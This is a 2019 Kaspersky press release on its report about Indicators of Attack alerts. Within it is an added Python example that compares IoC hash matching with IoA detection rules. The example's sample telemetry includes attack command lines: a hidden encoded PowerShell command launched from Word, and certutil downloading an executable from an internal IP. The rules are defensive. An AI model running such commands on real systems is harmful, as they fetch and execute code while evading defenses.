
Kaspersky Research Finds 1% of IoAs are Targeted Attacks

October 8, 2019

According to Kaspersky’s Managed Detection and Response Analytics report, in the first half of 2019, only 1.26% of Indicators of Attack (IoA) alerts on endpoint devices were identified as cybersecurity incidents. Of the 40,806 alerts generated via IoAs, only 515 resulted in detected incidents.

Woburn, MA – October 8, 2019 – According to Kaspersky’s Managed Detection and Response Analytics report, in the first half of 2019, only 1.26% of Indicators of Attack (IoA) alerts on endpoint devices were identified as cybersecurity incidents. Of the 40,806 alerts generated via IoAs, only 515 resulted in detected incidents. The results uncovered that most of these incidents were related to sophisticated targeted attacks that use “living off the land” techniques deployed by threat actors to hide malicious activity within legitimate user and administrator behavior.

Unlike Indicators of Compromise (IoC) detection methods, which match known artifacts of earlier attacks, IoAs identify an attack from the way particular threat actors tend to operate against their victims, that is, from their tactics, techniques and procedures. With “living off the land” attack techniques becoming more popular, IoA detection methods are proving to be the most effective. This is confirmed by additional report findings based on multiple levels of analysis of results from the Kaspersky Managed Protection service as delivered to several organizations from sectors including financial, governmental, industrial and transportation as well as IT and telecom.

While cybersecurity incidents were identified across almost all tactics of the cyber kill chain, the greatest number of attacks were found in the stages where the likelihood of false positives is relatively high: execution (37%), defense evasion (31%), lateral movement (16%) and impact (16%). For these tactics, the research found that Endpoint Protection Products (EPP) were an effective response for 97% of the incidents identified: 47% of these were classified as medium severity, including malware such as Trojans and cryptors, and 50% as low severity, including unwanted programs such as adware or riskware.

When it comes to advanced and unknown threats, those classified as high severity (3%), traditional EPP solutions alone are less effective. These types of threats, including targeted attacks and complex malware that use “living off the land” tactics, require an additional layer of TTP-based detection, manual threat hunting and analysis.
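To make the IoC/IoA distinction described above concrete, the following added example (written for this page, not code from Kaspersky or its report) runs two kinds of rule over a handful of constructed endpoint process events. The IoC rule is a hash denylist; the IoA rules describe how an attacker behaves (an Office application spawning a script interpreter, an encoded PowerShell command, certutil used as a downloader, an execution policy bypass) and are tagged with the kill-chain tactic they belong to. All hosts, users, command lines, hashes and rule names are assumptions made for the example.

```python
"""IoC matching versus IoA (behaviour-based) matching over endpoint telemetry.

Added example, not taken from Kaspersky's report or products. All hosts,
users, hashes and rules below are constructed for illustration.
"""
from dataclasses import dataclass
from typing import Callable, Dict, List, Set, Tuple


@dataclass(frozen=True)
class ProcessEvent:
    host: str
    user: str
    parent: str      # parent process image name
    image: str       # process image name
    cmdline: str
    sha256: str      # hash of the executed image


# Constructed placeholder hashes (not real file hashes).
H_DROPPER = "a1" * 32
H_PWSH = "b2" * 32
H_CERTUTIL = "c3" * 32
H_NOTEPAD = "d4" * 32

# Constructed telemetry: one known-bad binary, two living-off-the-land
# chains, one legitimate admin script run, and one benign event.
EVENTS = [
    ProcessEvent("ws01", "alice", "outlook.exe", "invoice.exe",
                 "invoice.exe", H_DROPPER),
    ProcessEvent("ws02", "bob", "winword.exe", "powershell.exe",
                 "powershell.exe -nop -w hidden -enc SQBFAFgAIAAoAE4A", H_PWSH),
    ProcessEvent("ws03", "svc_build", "cmd.exe", "certutil.exe",
                 "certutil.exe -urlcache -split -f http://10.0.0.5/t.exe t.exe",
                 H_CERTUTIL),
    ProcessEvent("srv01", "admin", "explorer.exe", "powershell.exe",
                 "powershell.exe -ExecutionPolicy Bypass -File C:\\ops\\patch.ps1",
                 H_PWSH),
    ProcessEvent("ws04", "carol", "explorer.exe", "notepad.exe",
                 "notepad.exe notes.txt", H_NOTEPAD),
]

# IoC: a denylist of artifacts (here, file hashes) seen in earlier attacks.
BAD_HASHES: Set[str] = {H_DROPPER}


def match_ioc(events: List[ProcessEvent], bad_hashes: Set[str]) -> List[ProcessEvent]:
    """Return events whose image hash is on the IoC denylist."""
    return [e for e in events if e.sha256 in bad_hashes]


# IoA: rules describing how an attacker tends to act, keyed to the tactic
# they belong to. Each predicate inspects process relationships and command
# lines rather than file identity, so it also fires on signed, legitimate
# binaries when they are used the way attackers use them.
OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
INTERPRETERS = {"powershell.exe", "cmd.exe", "wscript.exe", "cscript.exe", "mshta.exe"}
ENC_FLAGS = {"-enc", "-encodedcommand", "-e", "-ec"}


def _tokens(e: ProcessEvent) -> List[str]:
    return e.cmdline.lower().split()


IOA_RULES: List[Tuple[str, str, Callable[[ProcessEvent], bool]]] = [
    ("office_spawns_interpreter", "execution",
     lambda e: e.parent.lower() in OFFICE_APPS and e.image.lower() in INTERPRETERS),
    ("powershell_encoded_command", "defense_evasion",
     lambda e: e.image.lower() == "powershell.exe"
     and any(t in ENC_FLAGS for t in _tokens(e))),
    ("certutil_download", "defense_evasion",
     lambda e: e.image.lower() == "certutil.exe"
     and "-urlcache" in _tokens(e)
     and any(t.startswith("http") for t in _tokens(e))),
    ("powershell_policy_bypass", "execution",
     lambda e: e.image.lower() == "powershell.exe"
     and "-executionpolicy bypass" in e.cmdline.lower()),
]


def match_ioa(events: List[ProcessEvent],
              rules=IOA_RULES) -> List[Tuple[str, str, ProcessEvent]]:
    """Return (rule name, tactic, event) for every rule that fires on an event."""
    return [(name, tactic, e)
            for e in events
            for name, tactic, pred in rules if pred(e)]


def alerts_by_tactic(alerts: List[Tuple[str, str, ProcessEvent]]) -> Dict[str, int]:
    """Count IoA alerts per kill-chain tactic, as the report breaks them down."""
    counts: Dict[str, int] = {}
    for _, tactic, _ in alerts:
        counts[tactic] = counts.get(tactic, 0) + 1
    return counts


if __name__ == "__main__":
    for e in match_ioc(EVENTS, BAD_HASHES):
        print(f"IoC hit   {e.host:6} {e.image}")
    alerts = match_ioa(EVENTS)
    for name, tactic, e in alerts:
        print(f"IoA alert {e.host:6} {tactic:15} {name}: {e.cmdline}")
    print(alerts_by_tactic(alerts))
```

Running it shows the complementarity the release describes: the hash denylist catches only the dropper on ws01 and says nothing about ws02 or ws03, where every binary involved is a legitimate system tool. The IoA rules catch those two chains but also fire on srv01, where an administrator legitimately ran a script with an execution policy bypass. That alert is a false positive that only an analyst can resolve, which is exactly why IoA-based detection carries a higher triage cost than IoC matching.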

“One of the key takeaways of our Managed Detection and Response Analysis we have worked on in the last six months is that if you don’t see a large number of false-positive events in your network, that probably means that you are missing a lot of important security incidents,” said Sergey Soldatov, head of security operation center at Kaspersky. “Therefore, you should switch towards more wide-scale usage of Indicators of Attack methods, among other tools. While IoA-based alerts are much trickier to investigate due to the necessity to perform a lot of research to create efficient IoA and then a lot of manual analysis (when the IoA are triggered), our statistics show that these are most prone to false positives, yet they are the most effective and allow you to find really critical incidents.”

For more information about the Managed Detection and Response Analytics report, or how Kaspersky Managed Protection can help your business, please visit Securelist.com

About Kaspersky

Kaspersky is a global cybersecurity company founded in 1997. Kaspersky’s deep threat intelligence and security expertise is constantly transforming into innovative security solutions and services to protect businesses, critical infrastructure, governments and consumers around the globe. The company’s comprehensive security portfolio includes leading endpoint protection and a number of specialized security solutions and services to fight sophisticated and evolving digital threats. Over 400 million users are protected by Kaspersky technologies and we help 270,000 corporate clients protect what matters most to them. Learn more at usa.kaspersky.com.

Media Contact:
Cassandra Faro
Cassandra.Faro@Kaspersky.com
781-503-1812
